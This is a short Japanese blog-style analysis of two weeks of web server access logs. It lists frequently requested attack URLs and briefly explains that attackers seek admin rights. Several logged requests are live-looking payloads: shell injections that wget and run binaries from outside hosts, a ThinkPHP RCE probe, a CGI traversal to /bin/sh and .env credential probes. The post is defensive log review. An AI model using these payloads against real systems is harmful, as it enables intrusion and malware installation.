ログの集計期間は2/3〜2/16です。
アクセスログの中から10アクセス以上のURLを抽出しました。
6350 /manager/html
462 /
157 /xmlrpc.php
85 /.env
42 /autodiscover
27 91.218.66.202:4444
27 /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
17 /shell?cd+/tmp;rm+-rf+*;wget+%20botaflatoon.sytes.net/jaws;sh+/tmp/jaws
14 /?XDEBUG_SESSION_START=phpstorm
13 /shell?cd+/tmp;rm+-rf+*;wget+%20http://23.94.7.175/.s4y/arm;sh+/tmp/arm
13 /_ignition/execute-solution
12 /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21
12 /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
12 /_profiler/phpinfo
11 /debug/default/view?panel=config
11 /console/
11 /HNAP1/
10 /solr/admin/info/system?wt=json
/manage/htmlが圧倒的におおく6350アクセスですね。
管理者サイトにアクセスしようとしてますね。
管理者権限を取りに行こうとしてるのでしょう。
攻撃者のミッションの1つに権限昇格からの管理者権限を取り、侵入したサーバをコントロールすることがあります。
コントロール可能にしたら、機密情報を取ったり他のサーバへの攻撃用に使ったりします。
権限を奪取してもすぐに悪用せず、潜伏します。
このように権限をとってしまえば、やりたい放題ですので権限を取ってくるのです。
他にも攻撃の痕跡があります。
色々な攻撃を仕掛けてきているので、このログを他にも分析していきます。